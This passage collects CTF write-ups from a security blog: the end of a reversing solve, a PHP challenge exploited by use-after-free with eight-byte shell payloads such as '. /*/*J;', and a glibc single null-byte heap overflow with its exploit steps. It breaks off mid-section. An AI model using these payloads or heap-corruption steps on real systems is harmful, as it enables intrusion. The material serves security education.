x congruent 1447900004 (mod 2068691993)
x congruent 1601401973 (mod 1656909407)
x congruent 1717969277 (mod 1751421943)
</code></pre></div></div>
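<p>If you would rather not depend on a website, the same roots can probably be recovered locally. The moduli are only about 31 bits wide, so trial division is enough to factor them, and from there it is the textbook RSA inversion. This is a sketch, not what I did during the CTF: the function names are mine, it assumes <code class="highlighter-rouge">0x10001</code> is invertible modulo φ(n) for each modulus, and the three-argument <code class="highlighter-rouge">pow</code> with a negative exponent needs Python 3.8 or newer:</p>

```python
E = 0x10001

# (expected value, modulus) pairs from the five equations above.
CHECKS = [
    (0x031420fa, 0x77c7742d),
    (0x2b74da6b, 0x7d61e32d),
    (0x638682bf, 0x7b4dbc19),
    (0x5941d721, 0x62c26e5f),
    (0x5ced41bb, 0x686493f7),
]


def factor(n):
    """Factor n by trial division; fine for 32-bit moduli."""
    factors = {}
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors[d] = factors.get(d, 0) + 1
            n //= d
        d += 1
    if n > 1:
        factors[n] = factors.get(n, 0) + 1
    return factors


def euler_phi(n):
    """Euler's totient computed from the prime factorization of n."""
    phi = 1
    for p, k in factor(n).items():
        phi *= (p - 1) * p ** (k - 1)
    return phi


def solve(c, n, e=E):
    """Find x with x ** e % n == c, assuming gcd(e, phi(n)) == 1."""
    d = pow(e, -1, euler_phi(n))  # modular inverse of e, Python 3.8+
    return pow(c, d, n)


if __name__ == "__main__":
    for c, n in CHECKS:
        print(solve(c, n))
```

<p>If the constants are transcribed correctly this should print the same five numbers Wolfram gave back.</p>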
<p>Let’s see what that means if that was part of a password:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">>>></span> <span class="n">results</span> <span class="o">=</span> <span class="p">[</span><span class="mi">1936287603</span><span class="p">,</span> <span class="mi">1701279355</span><span class="p">,</span> <span class="mi">1447900004</span><span class="p">,</span> <span class="mi">1601401973</span><span class="p">,</span> <span class="mi">1717969277</span><span class="p">]</span>
<span class="o">>>></span> <span class="k">print</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"iiiii"</span><span class="p">,</span> <span class="o">*</span><span class="n">results</span><span class="p">))</span>
<span class="n">b</span><span class="s">'sgis{vged3MVuts_}!ff'</span>
</code></pre></div></div>
<p>That almost looks like a flag, but it might be big endian instead of
(default) little endian. Let’s try again:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">>>></span> <span class="k">print</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">">iiiii"</span><span class="p">,</span> <span class="o">*</span><span class="n">results</span><span class="p">))</span>
<span class="n">b</span><span class="s">'sigsegv{VM3d_stuff!}'</span>
</code></pre></div></div>
<p><strong>There we go.</strong></p>
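<p>The byte-order difference is easy to see without <code class="highlighter-rouge">struct</code> as well. The sketch below serializes the same five integers both ways using <code class="highlighter-rouge">int.to_bytes</code>; the helper name <code class="highlighter-rouge">words_to_bytes</code> is mine:</p>

```python
RESULTS = [1936287603, 1701279355, 1447900004, 1601401973, 1717969277]


def words_to_bytes(words, byteorder):
    """Serialize each integer as 4 bytes in the given byte order."""
    return b"".join(word.to_bytes(4, byteorder) for word in words)


little = words_to_bytes(RESULTS, "little")  # each group of 4 chars reversed
big = words_to_bytes(RESULTS, "big")        # most significant byte first

if __name__ == "__main__":
    print(little)
    print(big)
```

<p>Each 4-byte group is simply reversed between the two outputs, which is why the first attempt was almost readable.</p>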
<p>All in all this was an excellent typical reverse engineering challenge
to practice understanding ctf-style bytecode interpreters.</p>
Eight bytes to get a shell.
2015-10-29T00:00:00+00:00
https://wapiflapi.github.io/2015/10/29/eight-byte-shell
<p>This will be a quick one. Last week was hacklu again. And again it was in the
middle of the week. Nothing they can do about that they say, and I believe them
of course! Point being I didn’t have time to play properly, I only looked at one
challenge. There was one little trick I liked and wanted to share.</p>
<p><strong><em>Petition Builder</em></strong> is a challenge presenting itself as a website built using
PHP. It’s very simple: a form to submit petitions. A parameter allows you to prefill
the text you want to submit, and a quick check shows it gives read access to any
file on the system.</p>
<p>Dumping source code and configuration files gives us a better understanding of
the challenge. There is a PHP module that is loaded as a shared object. It has a
function <code class="highlighter-rouge">array_get_hashes</code> that is called from the PHP script.</p>
<p>It took me a (long) while, but I finally figured out where the vulnerability
lay. I’ll admit I didn’t see it reading the C code at first, which I’m truly
ashamed of. I had to resort to running tests to notice I was getting garbage
back. From there I fired up gdb to see what was up. It turned out some variable in a
loop was always used but only set in one of two cases. Because of how PHP works,
and the fact that this was used to initialize an array, the object was freed
each time, meaning that the one time it was used without being set it would
cause a <em>use after free</em>. Long story short, it was really easy to control the
contents of a <code class="highlighter-rouge">ZVal</code> and gain control of the execution by hijacking a method
call.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>call [rax] ; controlled rax and rdi pointing to 8 controlled bytes.
</code></pre></div></div>
<p>Afterwards, the organizers told me they expected us to ROP our way out of
there. But I wasn’t in the mood to check all of the available gadgets. With a
fairly easy leak and all of PHP and its libraries this would have been very
doable but it looked so time consuming! I was lazy.</p>
<p><code class="highlighter-rouge">system</code> was in the GOT so calling it with <code class="highlighter-rouge">call [rax]</code> is easy enough. <code class="highlighter-rouge">rdi</code> also
pointed to controlled bytes. I didn’t <em>want to</em> search for anything else.</p>
<p>Getting a shell in 8 bytes is easy: <code class="highlighter-rouge">'sh <&3;'</code>, or whatever fd is used for the
connection. But no, that did not work for apache/php. The developers are smart
enough to set the appropriate <code class="highlighter-rouge">FD_CLOEXEC</code> flags. Well done!</p>
<p>Something more clever was needed. I didn’t think it was possible to craft a file
by appending stuff byte by byte. <code class="highlighter-rouge">'echo a>x;'</code> is one byte too long, and without
the <code class="highlighter-rouge">;</code> (or null byte) the filename would be garbage. I was pretty sure the cwd
wouldn’t even be writable.</p>
<p>The next best thing to get our data on the server was relying on PHP. If you
send files using <code class="highlighter-rouge">POST</code> it stores them on disk until they are needed. A
check of <code class="highlighter-rouge">php.ini</code> confirmed that they would be stored in the system’s tmp
directory, with a name like <code class="highlighter-rouge">/tmp/php2dz5FZ</code>.</p>
<p><strong>Now, <code class="highlighter-rouge">'. /*/*J;'</code> is eight bytes.</strong> It took about 20 tries for php to randomly pick
<code class="highlighter-rouge">'J'</code> as the last letter while I crossed my fingers that nothing else on the remote
system would match <code class="highlighter-rouge">*J</code>; it didn’t on mine.</p>
<p>It took a bit longer for me to realise that they had strict firewalls in place
preventing my PoC from calling home. I just needed to write all output to a known
file and use the website vulnerability to read it.</p>
<p><strong>Visualizing a single null-byte heap overflow exploitation.</strong> wapiflapi, 2015-04-22T00:00:00+00:00, https://wapiflapi.github.io/2015/04/22/single-null-byte-heap-overflow</p>
<p>When Phantasmal Phantasmagoria wrote <a href="http://packetstorm.sigterm.no/papers/attack/MallocMaleficarum.txt"><em>The Malloc Maleficarum</em></a> back in 2005
he exposed several ways of gaining control of a program through corruption
of the internal state of the libc memory allocator. Ten years later people are
still exploring the possibilities offered by such complex data structures. In
this article I will present how I solved a <a href="http://github.com/ctfs/write-ups-2015/tree/master/plaidctf-2015/pwnable/plaiddb">challenge</a> from Plaid CTF 2015
and the <a href="http://github.com/wapiflapi/villoc">tool</a> I wrote in the process.</p>
<p>Phantasmal’s paper responded to the patches libc developers had made to stop previous
exploitation techniques. Some of the insights he presented are still relevant,
and people continue to go further as new techniques emerge. Project Zero gave a
good example of this with <a href="http://googleprojectzero.blogspot.fr/2014/08/the-poisoned-nul-byte-2014-edition.html"><em>The Poisoned NUL Byte</em></a> which they presented in
2014.</p>
<h1 id="quick-fuzzing-of-the-target-reveals-some-memory-errors">Quick fuzzing of the target reveals some memory errors</h1>
<p>After reverse engineering most of the target we had a pretty good understanding
of what we were up against. A basic main loop prompting the user and yielding
control to a different function for each valid user command:</p>
<ul>
<li><code class="highlighter-rouge">do_get</code>, <code class="highlighter-rouge">do_put</code>, <code class="highlighter-rouge">do_del</code>, <code class="highlighter-rouge">do_dump</code></li>
</ul>
<p>Those are pretty explicit; by looking at what they are doing we can easily
figure out what they are working on. We already knew the application had to be
storing key-value pairs because that’s what the user interface is all about.</p>
<p>These are stored in a binary tree, the <code class="highlighter-rouge">node</code> structure looks like this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000 key dq ; char *
00000008 datasz dq ; long
00000010 val dq ; char *
00000018 left dq ; node *
00000020 right dq ; node *
00000028 parent dq ; node *
00000030 is_leaf dq ; bool
</code></pre></div></div>
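<p>For scripting against this layout it can help to mirror it in Python. The sketch below assumes seven little-endian 8-byte fields, as in the listing above; the names <code class="highlighter-rouge">NODE_FORMAT</code>, <code class="highlighter-rouge">field_offset</code> and <code class="highlighter-rouge">unpack_node</code> are illustrative and not taken from the target.</p>

```python
import struct

# Field order copied from the node layout above; every field is 8 bytes.
NODE_FIELDS = ["key", "datasz", "val", "left", "right", "parent", "is_leaf"]
NODE_FORMAT = "<" + "Q" * len(NODE_FIELDS)
NODE_SIZE = struct.calcsize(NODE_FORMAT)


def field_offset(name):
    """Byte offset of a field inside the node."""
    return NODE_FIELDS.index(name) * 8


def unpack_node(raw):
    """Turn NODE_SIZE raw bytes into a {field: value} dict."""
    return dict(zip(NODE_FIELDS, struct.unpack(NODE_FORMAT, raw)))


print(hex(NODE_SIZE))
print({name: hex(field_offset(name)) for name in NODE_FIELDS})
```

<p>The resulting size of 0x38 bytes is what lets us tell nodes apart from keys and data when reading allocation traces.</p>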
<p>Everything is stored on the heap using <code class="highlighter-rouge">malloc</code>, <code class="highlighter-rouge">realloc</code> and <code class="highlighter-rouge">free</code>, so we
already see where this is going: a typical heap overflow challenge. As we didn’t
notice any obvious UAFs or buffer overflows during our initial recon we decided
to write a very simple fuzzer: ten lines of python trying random operations. We
maintained a set of about a dozen keys from which we picked at random, with
the possibility of replacing existing keys with new ones from time to time.</p>
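<p>The original fuzzer isn’t reproduced here, but the idea can be sketched as follows. This is a reconstruction under assumptions: the key alphabet, the size ranges and the 10% key replacement rate are guesses, and the generator only yields abstract operations without speaking the target’s actual protocol.</p>

```python
import random

OPS = ("GET", "PUT", "DEL", "DUMP")


def random_ops(count, seed=0, pool_size=12):
    """Yield `count` random operations over a small, slowly changing key pool."""
    rng = random.Random(seed)

    def new_key():
        # Hypothetical key shape: 1 to 64 bytes from a tiny alphabet.
        return bytes(rng.choice(b"abcdefgh") for _ in range(rng.randint(1, 64)))

    keys = [new_key() for _ in range(pool_size)]
    for _ in range(count):
        # From time to time, swap one key of the pool for a fresh one.
        if rng.random() < 0.1:
            keys[rng.randrange(pool_size)] = new_key()
        op = rng.choice(OPS)
        key = rng.choice(keys)
        if op == "PUT":
            value = bytes(rng.randrange(256) for _ in range(rng.randint(0, 512)))
            yield op, key, value
        elif op == "DUMP":
            yield (op,)
        else:
            yield op, key


for operation in random_ops(5, seed=42):
    print(operation[0], [len(arg) for arg in operation[1:]])
```

<p>Reusing a small pool of keys matters: it makes updates and deletions of existing entries likely, which exercises far more allocator activity than fresh keys would.</p>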
<p>Running the <strong>fuzzer with valgrind</strong> immediately exposed memory errors. Looking
at the faulty instruction it was <strong>immediately obvious where the bug lay</strong>. The
function used to read a key from stdin doubles the size of its internal buffer
using <code class="highlighter-rouge">realloc</code> when it doesn’t have enough space but fails to check this when
adding the final null byte. <strong>This causes a one (null) byte overflow on the
heap.</strong></p>
<p>We adapted our fuzzer so it would run into this case a lot more in the hope of
crashing the application instead of just generating valgrind warnings. The
simple change consists of picking key sizes that would cause this overflow:</p>
<p><code class="highlighter-rouge">(sz + 8) % 16 == 0, sz >= 24</code></p>
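<p>As a small illustration, the sizes satisfying this condition can be enumerated directly. The function name is hypothetical; the condition itself is the one given above.</p>

```python
def overflowing_key_sizes(limit):
    """Key sizes up to `limit` satisfying (sz + 8) % 16 == 0 and sz >= 24."""
    return [sz for sz in range(24, limit + 1) if (sz + 8) % 16 == 0]


print(overflowing_key_sizes(100))
```

<p>These are the sizes that exactly fill a chunk on 64-bit glibc, so the terminating null byte has nowhere to go but the next chunk’s header.</p>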
<p>This new fuzzer crashes the application in under a couple of seconds. Most
often because of an abort due to malloc’s integrity checks, sometimes because of
a segfault when the allocator is reading its internal data structures. We are
getting somewhere.</p>
<h1 id="we-need-better-visualization-tools">We need better visualization tools</h1>
<p>Last time I played with the heap for exploitation was when I wanted a shell on
<a href="/2014/04/30/getting-a-shell-on-fruits-bkpctf-2014/">fruits</a>. Basically I spent a couple hours badly drawing schematics of the
heap on pieces of paper. This time I decided to invest in writing a tool that
would do that for me. <a href="http://github.com/wapiflapi/villoc">Villoc</a> is a python script that parses the output of
ltrace and writes a static html file that’s a lot easier to read than my sketchy
drawings. Also several people can look at the same rendering which is pretty
useful.</p>
<p>If we open up some of our test cases we can easily figure out what is
happening. We pick a promising one, it aborted with the following error:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*** Error in `./datastore_7e64104f876f0aa3f8330a409d9b9924.elf':
free(): invalid pointer: 0x00005555557582a0 ***
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/fuzed_crash.html"><img src="/public/res/single-null-byte-heap-overflow/fuzed_crash.png" alt="villoc rendering of a crash" /></a>
This is the lower-right part of <a href="/public/res/single-null-byte-heap-overflow/fuzed_crash.html">the full rendering here</a>.</p>
<p>Villoc shows the state of the heap after each function call that changes it. An
important thing to note is that the blocks represented by villoc are memory
chunks <strong>including the malloc overhead</strong> whereas the values given by ltrace and
shown between each state are those seen by the user. This is also true for block
sizes: the first value is the real block size, the one enclosed in parentheses
is the one the user asked for.</p>
<p>The green block at <code class="highlighter-rouge">0x555555758218</code> is a key, it was reallocated several
times before the timeframe shown in this screenshot. This is where our overflow
occurs, the final null byte of this key is in fact written in the first byte of
the red block at <code class="highlighter-rouge">0x555555758298</code> that was already allocated. The red block
contains data, we know this because it is not the right size for a node (0x38)
and it has never been reallocated so it can’t be a key itself.</p>
<p>What happens is that the last operation of the crashing test case is a DEL, the
yellow block that is being reallocated is a new key and when it’s done it tries
to free the red (data) block and crashes. This is shown by villoc by coloring
the state in red and marking the faulty block.</p>
<p>Remember this is the block the green block overflowed into, so why exactly does
this cause <code class="highlighter-rouge">free</code> to abort with a message about an invalid pointer? It turns out
the reason for this is pretty unsatisfying: We corrupted the malloc meta-data at
the beginning of the block. That’s really all it is.</p>
<h1 id="taking-control-of-the-application">Taking control of the application</h1>
<p>Project Zero <a href="http://googleprojectzero.blogspot.fr/2014/08/the-poisoned-nul-byte-2014-edition.html">talked about this</a> and explained how it is possible to set up the
heap in such a way that a single null byte overflow can be leveraged to attack
the heap. That exact attack wasn’t usable because it relies on Fedora not
activating some <code class="highlighter-rouge">assert</code>s in production code but the challenge was running on
Ubuntu which <em>does</em> activate them. I took a different road and only the initial
corruption is the same.</p>
<p>When doing exploitation and not immediately being able to influence data
controlling the execution flow one must always ask the following question:
<strong>What <em>do</em> I control?</strong> This is simply what you’ll have to work with, so make
sure your list is exhaustive.</p>
<p>The header of a chunk holds its size, and this size is always a multiple of 16. This is
important because the lower bits are used as flags:</p>
<pre><code class="language-C++">#define PREV_INUSE 0x1 // previous adjacent chunk is in use
#define IS_MMAPPED 0x2 // the chunk was obtained with mmap()
#define NON_MAIN_ARENA 0x4 // the chunk isn't in the main arena
// I'm not so sure those comments are really useful though.
</code></pre>
<p>On little-endian architectures those are the bits we’ll be overflowing with our
null byte. If the size of the chunk we are overflowing into is a multiple of 256
then we’ll exactly clear those bits without changing the block’s size which
could have consequences and make our lives harder.</p>
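<p>The effect of the stray null byte on a size field can be simulated in a few lines. This is only a model of the little-endian 8-byte size field; the example sizes are made up.</p>

```python
import struct

PREV_INUSE = 0x1
IS_MMAPPED = 0x2
NON_MAIN_ARENA = 0x4


def null_byte_overflow(size_field):
    """Return the size field after its lowest byte is overwritten with 0."""
    raw = bytearray(struct.pack("<Q", size_field))
    raw[0] = 0  # the off-by-one null byte lands on the least significant byte
    return struct.unpack("<Q", bytes(raw))[0]


# Chunk size is a multiple of 256: only the flags are cleared.
print(hex(null_byte_overflow(0x100 | PREV_INUSE)))
# Chunk size is not a multiple of 256: the size itself shrinks too.
print(hex(null_byte_overflow(0x110 | PREV_INUSE)))
```

<p>In the second case the chunk silently loses 0x10 bytes, which is the kind of side effect we avoid by targeting chunks whose size is a multiple of 256.</p>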
<p>Clearing <code class="highlighter-rouge">IS_MMAPPED</code> and <code class="highlighter-rouge">NON_MAIN_ARENA</code> is probably harmless as they’d
most likely be zero already. This leaves us with <code class="highlighter-rouge">PREV_INUSE</code> which is promising
because it is guaranteed that we are changing something here. The block
preceding the block we are corrupting is obviously the block we are overflowing
and therefore it should always be in use. So what happens if we mark it as
freed?</p>
<p>Remember the null byte is written past the green block and corrupts the flags
of the red one.</p>
<p>When freeing the red block it will check the block preceding it. If it is free
the two blocks will be merged. When a block is not used malloc stores meta-data
not only in the header but also in places where there would normally be user
data. In particular <strong>it stores the size of the free block at the very end of
the block</strong>. This way when the red block is being freed and it notices the
previous block is supposed to be free as well, it can find the beginning of the
supposedly free block by looking right in front of its own header to get the
size of the previous block. Because the previous block, <strong>the green one</strong>, isn’t
actually free the data <code class="highlighter-rouge">free()</code> looks at when getting this size is <strong>controlled
by us</strong>.</p>
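<p>The lookup described above can be modelled on a toy heap. This is a simplified sketch, not glibc’s code: it ignores the unlink step and every integrity check, and the offsets and sizes are invented for the example.</p>

```python
import struct

PREV_INUSE = 0x1
FLAG_MASK = 0x7


def backward_merge(heap, chunk_off):
    """Return (start, size) of the chunk free() would end up with.

    The 8 bytes right before the size field hold the previous chunk's size,
    but they are only trusted when PREV_INUSE is clear.
    """
    prev_size, size_field = struct.unpack_from("<QQ", heap, chunk_off)
    size = size_field & ~FLAG_MASK
    if size_field & PREV_INUSE:
        return chunk_off, size
    return chunk_off - prev_size, size + prev_size


heap = bytearray(0x400)
victim = 0x300  # toy offset of the chunk we overflow into

# Healthy state: the previous chunk is marked as in use.
struct.pack_into("<Q", heap, victim + 8, 0x100 | PREV_INUSE)
before = backward_merge(heap, victim)

# The last 8 bytes of the preceding (in-use) buffer are ours to choose,
# and the overflowing null byte clears the flags of the victim.
struct.pack_into("<Q", heap, victim, 0x2C0)
heap[victim + 8] = 0
after = backward_merge(heap, victim)

print([hex(v) for v in before], [hex(v) for v in after])
```

<p>After the corruption the merged chunk starts wherever our chosen size says it does, which is the one value this bug really gives us control over.</p>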
<p>Now we know what we really control through this one null byte overwriting some
malloc bookkeeping. The question is what to do with it. Project Zero sets a size
such that the header of the supposedly free block is attacker controlled. Then
they craft a fake header somewhere containing arbitrary pointers that will
eventually cause an old school unlink-type write-what-where. Even if we were
targeting Fedora and this could work, we wouldn’t be able to pull it off because
we never bypassed ASLR and the challenge is PIE. This means <strong>we’ll need to make
our fake chunk start at an existing free chunk</strong>: that’s the only place where
we’ll find valid pointers.</p>
<p>After spending some time on this and a lot of experimentation I came to the
conclusion that it’s a bad idea to end up with a node, its key and its data
inside the fake free chunk. That makes it more difficult to leverage in
the end, since overwriting some part will probably overwrite the previous parts
as well, and as we haven’t leaked ASLR yet it’ll be hard to craft a consistent
data structure for the application to work with.</p>
<p>From now on I’ll explain parts of the heap feng shui used in my final
exploit. The full visualization of this can be found <a href="/public/res/single-null-byte-heap-overflow/exploit.html">here</a>.</p>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/create_hole.png" alt="first part of the full exploit" /></a>
This is the first part of <a href="/public/res/single-null-byte-heap-overflow/exploit.html">the full exploit visualization here</a>.</p>
<p>You’ll learn to recognize the basic pattern of allocating a node (green), this
is done even for look-ups of existing keys, followed by a malloc and optional
re-allocations for the key (sea green), and finally a malloc of a user
controlled size for the data (red). This pattern is repeated with the purple,
brown, yellow sequence. The corresponding operations are:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># This makes a hole between x's key and value.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"x"</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">b</span><span class="s">"X"</span> <span class="o">*</span> <span class="mh">0xff</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"x"</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">b</span><span class="s">"X"</span> <span class="o">*</span> <span class="mh">0xff</span><span class="p">)</span>
</code></pre></div></div>
<p>We made a hole. The freed block in the middle will be the one we’ll make our
fake free chunk point to. Then the <em>messy</em> zone will only affect the data which
we don’t care about, it can contain anything without affecting the stability of
the application’s data.</p>
<p>Now we need to temporarily fill this hole so it’s not used by what we’ll do next.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Fill up the hole with something we can remove later.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">'pad1'</span><span class="p">,</span> <span class="n">b</span><span class="s">'B'</span> <span class="o">*</span> <span class="mh">0xe7</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">'pad2'</span><span class="p">,</span> <span class="n">b</span><span class="s">'B'</span> <span class="o">*</span> <span class="mh">0x197</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/fill_hole.png" alt="temporarily fill the created hole" /></a>
Temporarily fill the created hole (<a href="/public/res/single-null-byte-heap-overflow/exploit.html">full exploit visualization here</a>).</p>
<p>Next we need to take some precautions that are only indirectly related to what
we want to achieve. We create a large hole in which all the future allocations
will be done followed by a wall we’ll <em>never</em> touch. This will protect us
against the specific behavior when taking memory from the wilderness.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Build a wall against the wilderness.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"_"</span> <span class="o">*</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">b</span><span class="s">"Y"</span> <span class="o">*</span> <span class="mh">0x8b0</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"wall"</span><span class="p">,</span> <span class="n">b</span><span class="s">"W"</span> <span class="o">*</span> <span class="mh">0x20</span><span class="p">,</span> <span class="n">trim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">"_"</span> <span class="o">*</span> <span class="mh">0x80</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/build_wall.png" alt="build a wall against the wilderness" /></a>
Build a wall against the wilderness (<a href="/public/res/single-null-byte-heap-overflow/exploit.html">full exploit visualization here</a>).</p>
<h3 id="the-plan">The plan.</h3>
<p>Now the plan is to reproduce our crashing test-case in this space, and we’ll be
able to make our fake chunk point to the empty space we made before (once we
have deleted the temporary fillings). We’ll end up with a huge fake free chunk
covering the data of the first allocated key (the yellow block) and whatever we
put after that if we decide to make the free chunk big enough.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Now create the setup where we can off-by-one.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"a"</span> <span class="o">*</span> <span class="mi">247</span><span class="p">,</span> <span class="n">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">123</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"a"</span> <span class="o">*</span> <span class="mi">247</span><span class="p">,</span> <span class="n">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">240</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_stage1.png" alt="trigger corruption stage 1" /></a></p>
<blockquote>
<p><strong>Put:</strong> Node, Key, Val; <strong>Put again!</strong> Node, (same) Key, Val.</p>
</blockquote>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># This computation is the size of our fake free chunk.
# It should make it start at the beginning of the filled up hole we control;
</span><span class="n">fake_sz</span> <span class="o">=</span> <span class="mh">0x100</span> <span class="o">+</span> <span class="mh">0x40</span> <span class="o">+</span> <span class="mh">0x190</span> <span class="o">+</span> <span class="mh">0x40</span> <span class="o">+</span> <span class="mh">0x110</span> <span class="o">+</span> <span class="mh">0x1a0</span>
<span class="n">craftedkey</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">fake_sz</span><span class="p">)</span><span class="o">.</span><span class="n">rjust</span><span class="p">(</span><span class="mi">248</span><span class="p">,</span> <span class="n">b</span><span class="s">"b"</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">craftedkey</span><span class="p">,</span> <span class="n">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">245</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_stage2.png" alt="trigger corruption stage 2" /></a></p>
<blockquote>
<p><strong>Put:</strong> Node, (different) Key. (Val not shown, it’s to the right.)</p>
</blockquote>
<p><strong>This triggers the corruption.</strong> This time it’s right where we want it. The
key, the block that is re-allocated in the last screenshot above ends up at
<code class="highlighter-rouge">0x555555758938</code> and overwrites the first byte of the header of the data block
right after it at <code class="highlighter-rouge">0x555555758a38</code>. The effect is we clear the flags that were
stored there and in particular the <code class="highlighter-rouge">PREV_INUSE</code> flag. We effectively mark the
previous block as free and <code class="highlighter-rouge">free()</code> will attempt to merge the block we are
corrupting with its predecessor when we free it. It will find the beginning of
the previous block by looking at the size stored at the end of a free block,
right in front of the header of the block being freed. We control this size and
you can see the computation in the python code above.</p>
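<p>To make the layout of the crafted key concrete, here is the same computation with a few checks added. The values come from the exploit code above; the explicit little-endian format and the checks themselves are additions for illustration.</p>

```python
import struct

# Same sum as in the exploit: the distance back to the hole we prepared.
fake_sz = 0x100 + 0x40 + 0x190 + 0x40 + 0x110 + 0x1A0

# The fake size occupies the last 8 bytes of the key, padding comes first.
craftedkey = struct.pack("<Q", fake_sz).rjust(248, b"b")

print(hex(fake_sz))
print(len(craftedkey), (len(craftedkey) + 8) % 16 == 0)
print(craftedkey[-8:].hex())
```

<p>The key is 248 bytes long so that it exactly fills its chunk: the last 8 bytes sit where <code class="highlighter-rouge">free()</code> will look for the previous size, and the terminating null byte lands on the next header.</p>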
<p>Now let’s delete the temporary padding we set up earlier and take a look at the
state of the full heap when that’s done:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Clear the hole we made before.
</span><span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">'pad1'</span><span class="p">)</span>
<span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">'pad2'</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_after.png" alt="trigger corruption stage 3" /></a></p>
<p>The bottom line of this image is a screen-shot of villoc, I added big colored
rectangles on top to be able to explain more easily below, from left to right:</p>
<ul>
<li>
<p><strong>initial key/val</strong>: The green marker at the left shows three blocks that
never moved, those are the three memory allocations (node, key, val) for the
initial value the program stores in its database at the very beginning of
its <code class="highlighter-rouge">main</code> function.</p>
</li>
<li>
<p><strong>our hole</strong>: Next the big red marker is the result of our first operation
preserved by the padding we set up. We have a node followed by its key, a
large gap and the associated data.</p>
<li>
<p><strong>victim</strong>: The purple marker shows the victims of our corruption, first the
node and key, and further to the right the data. This data block is the one
we corrupted malloc’s bookkeeping of.</p>
</li>
<li>
<p><strong>overflower</strong>: The blocks marked in yellow are the node, key and value of
the entry we overflowed. We overflowed the key into the data marked purple.</p>
</li>
<li>
<p><strong>the wall</strong>: At the far right we have three blocks in blue that never moved,
this is the wall protecting against the wilderness.</p>
</li>
</ul>
<p>Make sure you understand this picture of the heap. We’ll free the nodes marked
purple next and see how it affects malloc’s representation of the heap. Keep in
mind the data (last block) of this entry is corrupted and will cause malloc to
think there is a huge freed chunk before it. We control the size of this chunk
through the last bytes of the block we overflowed (yellow data).</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Commandeer the heap.
</span><span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">"a"</span> <span class="o">*</span> <span class="mi">247</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_cleared.png" alt="trigger corruption stage 3" /></a></p>
<p>As you can see this <code class="highlighter-rouge">DEL</code> causes a key to be re-allocated several times in the
space left of the wall. Once it has the full key the existing key is freed,
followed by the associated data and node. Finally the key used to do the look-up
is freed as well. <strong>This successfully freed our corrupted chunk.</strong> (The small
hole right in front of the reddish block on the right side of the image.)</p>
<p>I highlighted the region malloc considers freed after this operation in
blue. Yes it’s big. This is what we wanted and what we computed a few python
lines ago. <strong>The main corruption is now finished.</strong> The heap is a total mess and
we’ll be able to manipulate it in such a way that the application will have several data
structures using the same memory.</p>
<p>Let’s start confusing the program. We <code class="highlighter-rouge">GET</code> the value associated with the very
first key we put in the database, this is the one where we made sure there was a
hole between the key and the data. Look what happens:</p>
